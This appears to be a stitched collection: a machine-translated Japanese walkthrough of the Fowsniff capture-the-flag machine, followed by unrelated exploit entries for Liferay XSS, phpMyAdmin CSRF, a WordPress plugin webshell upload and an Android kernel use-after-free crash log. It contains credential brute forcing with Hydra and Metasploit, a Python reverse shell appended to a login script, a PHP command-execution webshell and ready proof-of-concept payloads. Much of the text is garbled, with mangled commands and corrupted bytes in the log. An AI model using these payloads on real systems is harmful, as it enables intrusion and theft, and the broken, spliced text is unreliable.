スキャンの結果は、4つのポートがオープン、22(SSH)、80(HTTP)、110(POP3)、および143(IMAP)が開いていることを示しています。
2。ターゲットマシンの侵入
1。最初に、ポート80が何かを獲得するかどうかを確認します。ブラウザを開いてアクセスしてください。
発表情報を使用して、ページをスクロールする静的HTMLページのように見えます:@fowsniffcorp
ページには何も見つかりませんでしたし、DIRBとNiktoでスキャンを続けることに利益はありませんでした
root@kali2018:〜#dirb http://192.168.1.13
root@kali2018:〜#nikto -h http://192.168.1.13
だから私はページに表示されたfowsniff Corpをグーグルで検索しました
粘着性のツイートでFowsniff Twitter(@fowsniffcorp)を見つけました:
リンクアドレスhttps://pastebin.com/nraqveexを開いた後、ウェブサイトのメールボックスから漏れた電子メールユーザーとパスワードがページに表示されます。
パスワードはMD5形式であり、SODM5(https://www.somd5.com/batch.html)またはHashcatを使用してパスワードを復号化できます。
次に、ユーザー名とパスワードの辞書を作成し、Hydraを介してPOP3を爆破します。
まず、すべてのユーザー名をuser.txtファイルに貼り付けて保存し、すべてのパスワードをpass.txtファイルに貼り付けて保存します。
MSFを使用してPOP3ログインを爆破することもできます。コマンドと構成は次のとおりです。
MSFUSEAUXILIARY/SCANNER/POP3/POP3_LOGIN
MSF Auxiliary(Scanner/POP3/POP3_LOGIN)SET RHOSTS192.168.1.13
Rhosts=192.168.1.13
MSF Auxiliary(scanner/pop3/pop3_login)set user_file /opt/user.txtを設定します
user_file=/opt/user.txt
MSF Auxiliary(Scanner/POP3/POP3_LOGIN)SET PASS_FILE /OPT/PASS.TXT
pass_file=/opt/pass.txt
MSF Auxiliary(Scanner/POP3/POP3_LOGIN)はfalseを設定します
verbose=false
MSF補助(スキャナー/POP3/POP3_LOGIN)エクスプロイト
実行後、図に示すように、正しい資格情報「Seina:scoobydoo2」が見つかりました。
次のように、メールアドレスはHydraを介して爆破されます。
hydra -l users.txt -p pass.txt -f {ip} pop3
-l〜username wordlist
-p〜パスワードワードリスト
-f〜有効なユーザーが見つかったときにひび割れを停止します
root@kali2018:/opt#hydra -l user.txt -p pass.txt -f 192.168.1.13pop3
ユーザー名Seinaと対応するパスワードが正常に爆破されていることがわかります。
次に、ターゲットマシンのPOP3サービスに接続し、取得したばかりの資格情報を使用してログインします。ログインした後、情報を確認して、2つのメッセージを見つけました。コマンドは次のとおりです。
root@kali2018:/opt#nc 192.168.1.13 110
+ok fowsniffコーポレートメールサーバーへようこそ!
ユーザーセイナ
+OK
Scoobydoo2を渡します
+OKログインしました。
リスト
+OK 2メッセージ:
1 1622
2 1280
リストコマンドを使用して、電子メール情報があるかどうかを確認します。 2つのメッセージがあることがわかります。その後、RETR [ID]を使用してメッセージを読み取ります。
最初のメッセージの内容を見て、SSHを含む一時的なパスワードは「s1ck3nbluff + secureShell」であることがわかりました。
ret 1
+OK 1622オクテット
Return-Path: Stone@Fowsniff
X-Original-to: Seina@Fowsniff
: Seina@Fowsniffに配信
fowsniffによる3:(postfix、userid1000から)
ID 0FA3916A;火曜日、2018年3月13日14:51:07 -0400(EDT)
to: baksteen@fowsniff、mauer@fowsniff、mursten@fowsniff、
Mustikka@fowsniff、parede@fowsniff、sciana@fowsniff、seina@fowsniff、
tegel@fowsniff
件名:緊急!セキュリティイベント!
Message-ID: 20180313185107.0FA3916A@FOWSNIFF
日付:火、2018年3月13日14336051:07 -0400(EDT)
From: Stone@Fowsniff(Stone)
親愛なるみんな、
数日前、悪意のある俳優がエントリーを得ることができました
私たちの内部電子メールシステム。攻撃者は悪用することができました
SQLデータベース内で誤ってフィルタリングされた脱出文字
ログイン資格情報にアクセスします。 SQLと認証の両方
システムは、しばらく更新されていなかったレガシー方法を使用しました。
完全な内部システムを実行するように指示されました
オーバーホール。メインシステムは「店内」ですが、
最小限のこの孤立した一時的なサーバーに移動しました
機能。
このサーバーはメールを送信および受信することができますが、
ローカル。つまり、他のユーザーにしかメールで送信できず、
World Wide Webへ。ただし、このシステムにアクセスできます
SSHプロトコル。
SSHの一時的なパスワードは「s1ck3nbluff+secureShell」です
このパスワードをできるだけ早く変更する必要があります。
ガイダンス。私は攻撃者がオンラインで投稿したリークを見ました、そして私はあなたの
パスワードはあまり安全ではありませんでした。
あなたの最も早い都合で私のオフィスで私に会いに来てください、そして私たちはそれをセットアップします。
ありがとう、
A.Jストーン
次に、2番目のメッセージを確認します。メッセージでは、送信者がbaksteen@fowsniffであることがわかります。ユーザー名はBaksteenであると推測できます。
ret 2
+OK 1280オクテット
return-path: baksteen@fowsniff
X-Original-to: Seina@Fowsniff
: Seina@Fowsniffに配信
fowsniffによる3:(postfix、from userid1004)
ID 101CA1AC2;火曜日、2018年3月13日14:54:05 -0400(EDT)
to: seina@fowsniff
subject:あなたは逃しました!
Message-id: 20180313185405.101ca1ac2@fowsniff
日付:火、2018年3月13日14336054:05 -0400(EDT)
from: baksteen@fowsniff
デヴィン、
あなたは今日、真鍮がAJに横たわるのを見るべきだった!
私たちはこの1つについて話をします。
地域のマネージャーが海軍にいたことを誰が知っていましたか?彼女は船乗りのように誓っていました!
どんな種類の肺炎やあなたが持ち帰るものがわかりません
あなたはあなたのキャンプ旅行からですが、私は自分でそれを持ってくると思います。
あなたはどのくらい去っていましたか - 一週間?
次回は病気になり、世紀の経営者の吹き出物を逃すつもりです
少なくとも自分自身に保管してください!
早く家に帰り、チキンスープを食べます。
私もストーンからメールを受け取ったと思いますが、おそらくいくつかです
「経営陣との私の会議のトーンを説明させてください」と顔を節約します。
戻ってきたら読みます。
気分が良くなる、
スカイラー
PS:メールパスワードを変更してください。
AJは、キャプテンの冒とくが現れる直前にそれをするように言っていました。
次に、取得したばかりの資格情報、つまりユーザー名:baksteenパスワード:s1ck3nbluff+secureShellを使用してSSHにログインします
root@kali2018:/opt#ssh baksteen@192.168.1.13
3。権限の提供
1。最初のタイプの許可強化
ログインに成功しました。システムの列挙後、ユーザーBaksteenが2つの異なるグループに属していることがわかりました。ユーザーグループに属するファイルを見つけようとし、スクリプト「Cube.sh」を見つけました。検索コマンドは次のとおりです。
baksteen@fowsniff:〜 $ find/group users -Type F 2/dev/null
このスクリプトファイルのコンテンツを確認したところ、SSHにログインした後に表示されるインターフェイス情報が含まれていることがわかりました。上記の写真でSSHログインが成功した後、スクリーンショットを比較することでわかります。
baksteen@fowsniff:〜 $ cd /opt /cube
baksteen@fowsniff:/opt/cube $ ls
baksteen@fowsniff:/opt/cube $ cat cube.sh
VIMを使用してファイルを開き、ファイルの最後にPythonリバウンドシェルコマンドの行を追加します。
python-c'importsocket、subprocess、os; s=socket.socket.socket(socket.af_inet、socket.sock_stream); s.connect(( '192.168.1.21 '、1234))
写真に示されているように:
保存後、スクリプトを実行してエラーを報告しようとします。エラーメッセージは「Pythonコマンドが見つかりません」です。そこで、システムでPythonを検索したところ、図に示すように、Python3がインストールされていることがわかりました。
そのため、次のように、コマンドをシェルをPython3にリバウンドするように変更します。
python3-c'importsocket、subprocess、os; s=socket.socket(socket.af_inet、socket.sock_stream); s.connect(( '192.168.1.29'、1234)); os.dup2(s.fileno()、0); os.dup2(s.fileno()、1);
# Exploit Title: Liferay Portal < 7.1 CE GA4 / SimpleCaptcha API XSS
# Date: 04/06/2019
# Exploit Author: Valerio Brussani (@val_brux)
# Website: www.valbrux.it
# Vendor Homepage: https://www.liferay.com/
# Software Link: https://www.liferay.com/it/downloads-community
# Version: < 7.1 CE GA4
# Tested on: Liferay Portal 7.1 CE GA3
# CVE: CVE-2019-6588
# Reference1: https://dev.liferay.com/web/community-security-team/known-vulnerabilities/liferay-portal-71/-/asset_publisher/7v4O7y85hZMo/content/cst-7130-multiple-xss-vulnerabilities-in-7-1-ce-ga3
# Reference2: https://www.valbrux.it/blog/2019/06/04/cve-2019-6588-liferay-portal-7-1-ce-ga4-simplecaptcha-api-xss/
Introduction
In Liferay Portal before 7.1 CE GA4, an XSS vulnerability exists in the SimpleCaptcha API when custom code passes unsanitized input
into the “url” parameter of the JSP taglib call <liferay-ui:captcha url=”<%= url %>” /> or <liferay-captcha:captcha url=”<%= url %>” />.
A customized Liferay portlet which directly calls the Simple Captcha API without sanitizing the input could be susceptible to this vulnerability.
Poc
In a sample scenario of custom code calling the <liferay-ui:captcha url=”<%= url %>” /> JSP taglib, appending a payload like the following to the body parameters of a customized form:
&xxxx%22%3e%3cscript%3ealert(1)</script>
The script is reflected in the src attribute of the <img> tag, responsible of fetching the next available captcha:
<img alt=”xxx” class=”xxxx” src=”xxxxxx“><script>alert(1)</script>=” />
# Exploit Title: Cross Site Request Forgery (CSRF)
# Date: 11 June 2019
# Exploit Author: Riemann
# Vendor Homepage: https://www.phpmyadmin.net/
# Software Link: https://www.phpmyadmin.net/downloads/
# Version: 4.8
# Tested on: UBUNTU 16.04 LTS -Installed Docker image - docker pull phpmyadmin/phpmyadmin:4.8
# CVE : 2019-12616
# Description
# An issue was discovered in phpMyAdmin before 4.9.0. A vulnerability was found that allows an attacker to trigger a CSRF attack against a phpMyAdmin user. The attacker can trick the user, for instance through a broken <img> tag pointing at the victim's phpMyAdmin database, and the attacker can potentially deliver a payload (such as a specific INSERT or DELETE statement) to the victim.
#VULNERABILITY:
The following request which is a form submission is done using the ¨GET¨ request instead of using ¨POST
<form method="get" action="index.php" class="disableAjax">
GET http://localhost:9000/tbl_sql.php?sql_query=INSERT+INTO+%60pma__bookmark%60+(%60id%60%2C+%60dbase%60%2C+%60user%60%2C+%60label%60%2C+%60query%60)+VALUES+(DAYOFWEEK(%27%27)%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27)&show_query=1&db=phpmyadmin&table=pma__bookmark HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:67.0) Gecko/20100101 Firefox/67.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Connection: keep-alive
Cookie: pmaCookieVer=5; pma_lang=en; pma_collation_connection=utf8mb4_unicode_ci; pmaUser-1=%7B%22iv%22%3A%22M16ZzlA0rqF9BZ1jFsssjQ%3D%3D%22%2C%22mac%22%3A%22804941d12fceca0997e181cbcb8427d68c668240%22%2C%22payload%22%3A%22mD9juTxAYhC7lA7XPWHWOw%3D%3D%22%7D; phpMyAdmin=9bdd66557e399fc1447bf253bc2dc133
Upgrade-Insecure-Requests: 1
Host: localhost:9000
The attacker can easily create a fake hyperlink containing the request that wants to execute on behalf the user,in this way making possible a CSRF attack due to the wrong use of HTTP method
#POC
<!doctype html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>POC CVE-2019-12616</title>
</head>
<body>
<a href="http://localhost:9000/tbl_sql.php?sql_query=INSERT+INTO+`pma__bookmark`+(`id`%2C+`dbase`%2C+`user`%2C+`label`%2C+`query`)+VALUES+(DAYOFWEEK('')%2C+''%2C+''%2C+''%2C+'')&show_query=1&db=phpmyadmin&table=pma__bookmark">View my Pictures!</a>
</body>
</html>
# Exploit Title: Authenticated code execution in `insert-or-embed-articulate-content-into-wordpress` Wordpress plugin
# Description: It is possible to upload and execute a PHP file using the plugin option to upload a zip archive
# Date: june 2019
# Exploit Author: xulchibalraa
# Vendor Homepage: https://wordpress.org/plugins/insert-or-embed-articulate-content-into-wordpress/
# Software Link: https://downloads.wordpress.org/plugin/insert-or-embed-articulate-content-into-wordpress.4.2995.zip
# Version: 4.2995 <= 4.2997
# Tested on: Wordpress 5.1.1, PHP 5.6
# CVE : -
## 1. Create a .zip archive with 2 files: index.html, index.php
echo "<html>hello</html>" > index.html
echo "<?php echo system($_GET['cmd']); ?>" > index.php
zip poc.zip index.html index.php
## 2. Log in to wp-admin with any user role that has access to the plugin functionality (by default even `Contributors` role have access to it)
## 3. Create a new Post -> Select `Add block` -> E-Learning -> Upload the poc.zip -> Insert as: Iframe -> Insert (just like in tutorial https://youtu.be/knst26fEGCw?t=44 ;)
## 4. Access the webshell from the URL displayed after upload similar to
http://website.com/wp-admin/uploads/articulate_uploads/poc/index.php?cmd=whoami
The following issue exists in the android-msm-wahoo-4.4-pie branch of
https://android.googlesource.com/kernel/msm (and possibly others):
When kgsl_mem_entry_destroy() in drivers/gpu/msm/kgsl.c is called for a writable
entry with memtype KGSL_MEM_ENTRY_USER, it attempts to mark the entry's pages
as dirty using the function set_page_dirty(). This function first loads
page->mapping using page_mapping(), then calls the function pointer
mapping->a_ops->set_page_dirty.
The bug is that, as explained in upstream commit e92bb4dd9673
( https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=e92bb4dd9673945179b1fc738c9817dd91bfb629),
the mapping of a page can be freed concurrently unless it is protected somehow
(e.g. by holding the page lock, or by holding a reference to the mapping).
For callers who don't hold any such lock or reference, set_page_dirty_lock() is
provided to safely mark a page as dirty:
==================================
/*
* set_page_dirty() is racy if the caller has no reference against
* page->mapping->host, and if the page is unlocked. This is because another
* CPU could truncate the page off the mapping and then free the mapping.
*
* Usually, the page _is_ locked, or the caller is a user-space process which
* holds a reference on the inode by having an open file.
*
* In other cases, the page should be locked before running set_page_dirty().
*/
int set_page_dirty_lock(struct page *page)
{
int ret;
lock_page(page);
ret = set_page_dirty(page);
unlock_page(page);
return ret;
}
==================================
To reproduce on a Pixel 2 (walleye):
- Check out the tree specified above.
- Enable KASAN in the kernel config.
- Apply the attached kernel patch kgsl-bigger-race-window.patch to make the
race window much bigger.
- Build and boot the kernel.
- Build the attached poc.c with
`aarch64-linux-gnu-gcc -static -o poc poc.c -Wall`.
- Run the PoC on the device (adb push, then run from adb shell).
You should see a kernel crash like this; note KASAN's report of a UAF in
set_page_dirty():
==================================
<6>[ 445.698708] c3 688 mdss_fb_blank_sub: mdss_fb_blank+0x1d0/0x2b4 mode:0
<3>[ 447.372706] c3 2621 ==================================================================
<3>[ 447.372963] c3 2621 BUG: KASAN: use-after-free in set_page_dirty+0x4c/0xd0
<3>[ 447.380051] c3 2621 Read of size 8 at addr 0000000000000000 by task kworker/3:3/2621
<3>[ 447.387059] c3 2621
<4>[ 447.394762] c3 2621 CPU: 3 PID: 2621 Comm: kworker/3:3 Not tainted 4.4.116-gbcd0ecccd040-dirty #45
<4>[ 447.397158] c3 2621 Hardware name: Qualcomm Technologies, Inc. MSM8998 v2.1 (DT)
<4>[ 447.406473] c3 2621 Workqueue: kgsl-mementry _deferred_put
<4>[ 447.418479] c3 2621 Call trace:
<4>[ 447.418660] c3 2621 [<ffffffa689e8dfbc>] dump_backtrace+0x0/0x2b4
<4>[ 447.421952] c3 2621 [<ffffffa689e8e394>] show_stack+0x14/0x1c
<4>[ 447.428066] c3 2621 [<ffffffa68a2f3d2c>] dump_stack+0xa4/0xcc
<4>[ 447.433965] c3 2621 [<ffffffa68a07b254>] print_address_description+0x94/0x340
<4>[ 447.439870] c3 2621 [<ffffffa68a07b784>] kasan_report+0x1f8/0x340
<4>[ 447.447145] c3 2621 [<ffffffa68a079a10>] __asan_load8+0x74/0x90
<4>[ 447.453407] c3 2621 [<ffffffa68a0205b4>] set_page_dirty+0x4c/0xd0
<4>[ 447.459621] c3 2621 [<ffffffa68a6c5dec>] kgsl_mem_entry_destroy+0x1c0/0x218
<4>[ 447.465695] c3 2621 [<ffffffa68a6c63d8>] _deferred_put+0x34/0x3c
<4>[ 447.473017] c3 2621 [<ffffffa689edc124>] process_one_work+0x254/0x78c
<4>[ 447.479093] c3 2621 [<ffffffa689edc6f4>] worker_thread+0x98/0x718
<4>[ 447.485551] c3 2621 [<ffffffa689ee59a4>] kthread+0x114/0x130
<4>[ 447.491801] c3 2621 [<ffffffa689e84250>] ret_from_fork+0x10/0x40
<3>[ 447.497696] c3 2621
<3>[ 447.503818] c3 2621 Allocated by task 2684:
<4>[ 447.506206] c3 2621 [<ffffffa689e8d624>] save_stack_trace_tsk+0x0/0x1b8
<4>[ 447.511847] c3 2621 [<ffffffa689e8d7f4>] save_stack_trace+0x18/0x20
<4>[ 447.517829] c3 2621 [<ffffffa68a079e74>] kasan_kmalloc.part.5+0x50/0x124
<4>[ 447.523494] c3 2621 [<ffffffa68a07a198>] kasan_kmalloc+0xc4/0xe4
<4>[ 447.529547] c3 2621 [<ffffffa68a07a964>] kasan_slab_alloc+0x14/0x1c
<4>[ 447.534931] c3 2621 [<ffffffa68a078030>] kmem_cache_alloc+0x144/0x27c
<4>[ 447.540572] c3 2621 [<ffffffa68a187bdc>] ext4_alloc_inode+0x28/0x234
<4>[ 447.546387] c3 2621 [<ffffffa68a0afe94>] alloc_inode+0x34/0xd0
<4>[ 447.552112] c3 2621 [<ffffffa68a0b19e8>] new_inode+0x20/0xe8
<4>[ 447.557318] c3 2621 [<ffffffa68a154214>] __ext4_new_inode+0xe8/0x1f00
<4>[ 447.562360] c3 2621 [<ffffffa68a17087c>] ext4_tmpfile+0xb4/0x230
<4>[ 447.568172] c3 2621 [<ffffffa68a09f9e8>] path_openat+0x934/0x1404
<4>[ 447.573556] c3 2621 [<ffffffa68a0a1a50>] do_filp_open+0x98/0x188
<4>[ 447.579027] c3 2621 [<ffffffa68a089004>] do_sys_open+0x170/0x2d4
<4>[ 447.584407] c3 2621 [<ffffffa68a0891a0>] SyS_openat+0x10/0x18
<4>[ 447.589787] c3 2621 [<ffffffa689e842b0BCho<D5>
^@^@<90>^A,^A^Hp<D6>M>] el0_svc_naked+0x24/0x28
<3>[ 447.594909] c3 2621
<3>[ 447.599065] c3 2621 Freed by task 36:
<4>[ 447.601330] c3 2621 [<ffffffa689e8d624>] save_stack_trace_tsk+0x0/0x1b8
<4>[ 447.606461] c3 2621 [<ffffffa689e8d7f4>] save_stack_trace+0x18/0x20
<4>[ 447.612450] c3 2621 [<ffffffa68a07aa1c>] kasan_slab_free+0xb0/0x1c0
<4>[ 447.618091] c3 2621 [<ffffffa68a0770c0>] kmem_cache_free+0x80/0x2f8
<4>[ 447.623733] c3 2621 [<ffffffa68a1863f8>] ext4_i_callback+0x18/0x20
<4>[ 447.629363] c3 2621 [<ffffffa689f5c430>] rcu_nocb_kthread+0x20c/0x264
<4>[ 447.634926] c3 2621 [<ffffffa689ee59a4>] kthread+0x114/0x130
<4>[ 447.640726] c3 2621 [<ffffffa689e84250>] ret_from_fork+0x10/0x40
<3>[ 447.645765] c3 2621
<3>[ 447.649913] c3 2621 The buggy address belongs to the object at 0000000000000000
<3>[ 447.649913] c3 2621 which belongs to the cache ext4_inode_cache of size 1048
<3>[ 447.652315] c3 2621 The buggy address is located 680 bytes inside of
<3>[ 447.652315] c3 2621 1048-byte region [0000000000000000, 0000000000000000)
<3>[ 447.667170] c3 2621 The buggy address belongs to the page:
<1>[ 447.680933] c3 2621 Unable to handle kernel paging request at virtual address ffffffd8929b3000
<1>[ 447.686392] c3 2621 pgd = 0000000000000000
<1>[ 447.695099] c3 2621 [ffffffd8929b3000] *pgd=0000000000000000, *pud=0000000000000000
<4>[ 447.706506] c3 2621 ------------[ cut here ]------------
<2>[ 447.706664] c3 2621 Kernel BUG at 0000000000000000 [verbose debug info unavailable]
<0>[ 447.711676] c3 2621 Internal error: Oops - BUG: 96000047 [#1] PREEMPT SMP
<4>[ 447.719517] c3 2621 Modules linked in:
<4>[ 447.729365] c3 2621 CPU: 3 PID: 2621 Comm: kworker/3:3 Not tainted 4.4.116-gbcd0ecccd040-dirty #45
<4>[ 447.729573] c3 2621 Hardware name: Qualcomm Technologies, Inc. MSM8998 v2.1 (DT)
<4>[ 447.738760] c3 2621 Workqueue: kgsl-mementry _deferred_put
<4>[ 447.750779] c3 2621 task: 0000000000000000 task.stack: 0000000000000000
<4>[ 447.750972] c3 2621 PC is at el1_sync+0x28/0xe0
<4>[ 447.757719] c3 2621 LR is at dump_page+0x10/0x18
<4>[ 447.762390] c3 2621 pc : [<ffffffa689e836e8>] lr : [<ffffffa68a04d9dc>] pstate: 204003c5
<4>[ 447.767106] c3 2621 sp : ffffffd8929b2f60
<4>[ 447.775306] c3 2621 x29: ffffffd8929b4000 x28: ffffffd88e9a47d0
<4>[ 447.784631] c3 2621 x27: ffffffd8294fab80 x26: ffffffa68ba1f000
<4>[ 447.789927] c3 2621 x25: ffffffd8536fc908 x24: ffffffd8536fc4e8
<4>[ 447.795219] c3 2621 x23: ffffffd892e55500 x22: 0000000000000001
<4>[ 447.800513] c3 2621 x21: ffffffa68ba1aa00 x20: 0000000000000000
<4>[ 447.805809] c3 2621 x19: ffffffbe214dbe00 x18: 0000007f7dc4ef8a
<4>[ 447.811105] c3 2621 x17: 0000007f809eb0e0 x16: ffffffa68a0a5178
<4>[ 447.816400] c3 2621 x15: 0000000000000021 x14: 202c303030303030
<4>[ 447.821694] c3 2621 x13: 3030303030303030 x12: e95cc056ac940c73
<4>[ 447.826992] c3 2621 x11: ffffffd8929fb810 x10: ffffff8b12978008
<4>[ 447.832286] c3 2621 x9 : ffffff8b12978007 x8 : ffffffa68a21a558
<4>[ 447.837590] c3 2621 x7 : ffffffa68c69ec28 x6 : 0000000000000040
<4>[ 447.842872] c3 2621 x5 : 0000000000000000 x4 : ffffff87c429b7c0
<4>[ 447.848170] c3 2621 x3 : ffffffa68a04d8dc x2 : 0000000000000000
<4>[ 447.853468] c3 2621 x1 : ffffffa68ba1aa00 x0 : ffffffbe214dbe00
<4>[ 447.858765] c3 2621
<4>[ 447.858765] c3 2621 PC: 0xffffffa689e836a8:
<4>[ 447.859009] c3 2621 36a8 d503201f d503201f d503201f d503201f d503201f d503201f a90007e0 a9010fe2
<4>[ 447.873684] c3 2621 36c8 a90217e4 a9031fe6 a90427e8 a9052fea a90637ec a9073fee a90847f0 a9094ff2
<4>[ 447.881847] c3 2621 36e8 a90a57f4 a90b5ff6 a90c67f8 a90d6ffa a90e77fc 9104c3f5 d538411c f9400794
<4>[ 447.890005] c3 2621 3708 f90093f4 d2c01014 f9000794 d5384036 d5384017 a90f57fe d503201f d5382015
<4>[ 447.898172] c3 2621
<4>[ 447.898172] c3 2621 LR: 0xffffffa68a04d99c:
<4>[ 447.898371] c3 2621 d99c b000ce80 9113e000 97feface aa1303e0 9400affc f9400260 9117e2e1 528002a2
<4>[ 447.91300BCho<D6>
^@^@<90>^A+^A<98>3<8E><DA>8] c3 2621 d9bc 9106c021 8a000280 97ffff2c 17ffffe6 a9bf7bfd d2800002 910003fd 97ffffb4
<4>[ 447.921170] c3 2621 d9dc a8c17bfd d65f03c0 a9ac7bfd 910003fd a90153f3 a9025bf5 a90363f7 a9046bf9
<4>[ 447.929328] c3 2621 d9fc a90573fb d10443ff aa0003f3 9400afe5 aa1303e0 f8410402 f90033a2 9400af97
<4>[ 447.937494] c3 2621
<4>[ 447.937494] c3 2621 SP: 0xffffffd8929b2f20:
<4>[ 447.937693] c3 2621 2f20 8a04d9dc ffffffa6 929b2f60 ffffffd8 89e836e8 ffffffa6 204003c5 00000000
<4>[ 447.952331] c3 2621 2f40 00000000 00000000 00000000 00000000 ffffffff ffffffff 00000000 00000000
<4>[ 447.960491] c3 2621 2f60 214dbe00 ffffffbe 8ba1aa00 ffffffa6 00000000 00000000 8a04d8dc ffffffa6
<4>[ 447.968651] c3 2621 2f80 c429b7c0 ffffff87 00000000 00000000 00000040 00000000 8c69ec28 ffffffa6
<4>[ 447.976809] c3 2621
<0>[ 447.976941] c3 2621 Process kworker/3:3 (pid: 2621, stack limit = 0x0000000000000000)
<4>[ 447.979247] c3 2621 Call trace:
<4>[ 447.987122] c3 2621 Exception stack(0xffffffd8929b2d60 to 0xffffffd8929b2e90)
<4>[ 447.990662] c3 2621 2d60: ffffffbe214dbe00 0000008000000000 00000000836e2000 ffffffa689e836e8
<4>[ 447.997788] c3 2621 2d80: 00000000204003c5 0000000000000025 ffffffd8536fc908 0000000000000000
<4>[ 448.006468] c3 2621 2da0: 0000000000000000 0000000000000000 0000000000000000 0000000000000000
<4>[ 448.015098] c3 2621 2dc0: 0000000000000000 0000000000000000 0000000000000000 0000000000000000
<4>[ 448.023777] c3 2621 2de0: 0000000000000000 0000000000000000 0000000000000000 0000000000000000
<4>[ 448.032461] c3 2621 2e00: 0000000000000000 0000000000000000 0000000000000000 0000000000000000
<4>[ 448.041195] c3 2621 2e20: 0000000000000000 e95cc056ac940c73 ffffffbe214dbe00 ffffffa68ba1aa00
<4>[ 448.049872] c3 2621 2e40: 0000000000000000 ffffffa68a04d8dc ffffff87c429b7c0 0000000000000000
<4>[ 448.058561] c3 2621 2e60: 0000000000000040 ffffffa68c69ec28 ffffffa68a21a558 ffffff8b12978007
<4>[ 448.067216] c3 2621 2e80: ffffff8b12978008 ffffffd8929fb810
<4>[ 448.075867] c3 2621 [<ffffffa689e836e8>] el1_sync+0x28/0xe0
<0>[ 448.081787] c3 2621 Code: a90637ec a9073fee a90847f0 a9094ff2 (a90a57f4)
<4>[ 448.087496] c3 2621 ---[ end trace 8d4b2347f8b71fe7 ]---
<4>[ 448.087540] c4 2684 ------------[ cut here ]------------
<2>[ 448.087544] c4 2684 Kernel BUG at 0000000000000000 [verbose debug info unavailable]
<0>[ 448.087547] c4 2684 Internal error: Oops - BUG: 96000005 [#2] PREEMPT SMP
<4>[ 448.087553] c4 2684 Modules linked in:
<4>[ 448.087561] c4 2684 CPU: 4 PID: 2684 Comm: poc Tainted: G D 4.4.116-gbcd0ecccd040-dirty #45
<4>[ 448.087563] c4 2684 Hardware name: Qualcomm Technologies, Inc. MSM8998 v2.1 (DT)
<4>[ 448.087565] c4 2684 task: 0000000000000000 task.stack: 0000000000000000
<4>[ 448.087578] c4 2684 PC is at qlist_free_all+0x3c/0x80
<4>[ 448.087581] c4 2684 LR is at qlist_free_all+0x7c/0x80
<4>[ 448.087585] c4 2684 pc : [<ffffffa68a07bbbc>] lr : [<ffffffa68a07bbfc>] pstate: 60400145
<4>[ 448.087586] c4 2684 sp : ffffffd87e3b3880
<4>[ 448.087591] c4 2684 x29: ffffffd87e3b3880 x28: ffffffa68ca1a000
<4>[ 448.087595] c4 2684 x27: 000000000591e848 x26: ffffffd87e3b3920
<4>[ 448.087598] c4 2684 x25: 0000000000000140 x24: 0000000000000000
<4>[ 448.087601] c4 2684 x23: ffffffd87e3b3920 x22: ffffffa68a07bbbc
<4>[ 448.087604] c4 2684 x21: 0000000000000000 x20: ffffffd8929f8040
<4>[ 448.087607] c4 2684 x19: ffffffd8929f8040 x18: 00000000c8056d20
<4>[ 448.087611] c4 2684 x17: 000000002c754130 x16: 0000000085837409
<4>[ 448.087613] c4 2684 x15: 00000000a50d5ad3 x14: 0000000000000000
<4>[ 448.087617] c4 2684 x13: 0000000001075000 x12: ffffffffffffffff
<4>[ 448.087620] c4 2684 x11: 0000000000000040 x10: ffffff8b0fc76746
<4>[ 448.087623] c4 2684 x9 : ffffff8b0fc76745 x8 : ffffffd87e3b3a2b
<4>[ 448.087626] c4 2684 x7 : 0000000000000000 x6 : ffffffd87e3b3a08
<4>[ 448.087629] c4 2684 x5 : fffffffffe8c0000 x4 : 0000000000000000
<4>[ 448.087632] c4 2684 x3 : fBCho<D7>
^@^@<90>^A*^A<91><F9>%5fffffd8929f7ff0 x2 : 0000000000000000
<4>[ 448.087635] c4 2684 x1 : dead0000000000ff x0 : 0000000000000000
<4>[ 448.087637] c4 2684
<4>[ 448.087637] c4 2684 PC: 0xffffffa68a07bb7c:
<4>[ 448.087646] c4 2684 bb7c 17fffff1 a9bc7bfd 910003fd a90153f3 a9025bf5 f9001bf7 f9400013 b4000253
<4>[ 448.087655] c4 2684 bb9c 90000016 aa0103f5 aa0003f7 912ef2d6 14000002 aa1403f3 aa1503e0 b40001f5
<4>[ 448.087664] c4 2684 bbbc b980c401 aa1603e2 f9400274 cb010261 97fff36f b5ffff14 f90006ff f90002ff
<4>[ 448.087673] c4 2684 bbdc f9000aff a94153f3 a9425bf5 f9401bf7 a8c47bfd d65f03c0 aa1303e0 97ffff93
<4>[ 448.087675] c4 2684
<4>[ 448.087675] c4 2684 LR: 0xffffffa68a07bbbc:
<4>[ 448.087684] c4 2684 bbbc b980c401 aa1603e2 f9400274 cb010261 97fff36f b5ffff14 f90006ff f90002ff
<4>[ 448.087692] c4 2684 bbdc f9000aff a94153f3 a9425bf5 f9401bf7 a8c47bfd d65f03c0 aa1303e0 97ffff93
<4>[ 448.087701] c4 2684 bbfc 17fffff0 a9bc7bfd aa0003e2 910003fd a90153f3 f0012ed3 aa0003f4 b000eb40
<4>[ 448.087711] c4 2684 bc1c 910083a1 d538d083 913c8000 f90013bf 8b000060 f9452a63 f9001fa3 f90017bf
<4>[ 448.087712] c4 2684
<4>[ 448.087712] c4 2684 SP: 0xffffffd87e3b3840:
<4>[ 448.087722] c4 2684 3840 8a07bbfc ffffffa6 7e3b3880 ffffffd8 8a07bbbc ffffffa6 60400145 00000000
<4>[ 448.087731] c4 2684 3860 7e3b3920 ffffffd8 00000000 00000000 00000000 00000080 8b4ddfd0 ffffffa6
<4>[ 448.087740] c4 2684 3880 7e3b38c0 ffffffd8 8a07bf9c ffffffa6 8c656000 ffffffa6 8ca1f500 ffffffa6
<4>[ 448.087749] c4 2684 38a0 8ca1a000 ffffffa6 000000f7 00000000 8c68d000 ffffffa6 fabb3a00 ffffffd7
<4>[ 448.087750] c4 2684
<0>[ 448.087753] c4 2684 Process poc (pid: 2684, stack limit = 0x0000000000000000)
<4>[ 448.087754] c4 2684 Call trace:
<4>[ 448.087758] c4 2684 Exception stack(0xffffffd87e3b3680 to 0xffffffd87e3b37b0)
<4>[ 448.087763] c4 2684 3680: ffffffd8929f8040 0000008000000000 00000000836e2000 ffffffa68a07bbbc
<4>[ 448.087768] c4 2684 36a0: 0000000060400145 0000000000000025 0000000000000140 ffffffd7fabb3a00
<4>[ 448.087773] c4 2684 36c0: 0000000000000000 ffffffd87e3b37d0 ffffffd87e3b3720 ffffffa68a0768e0
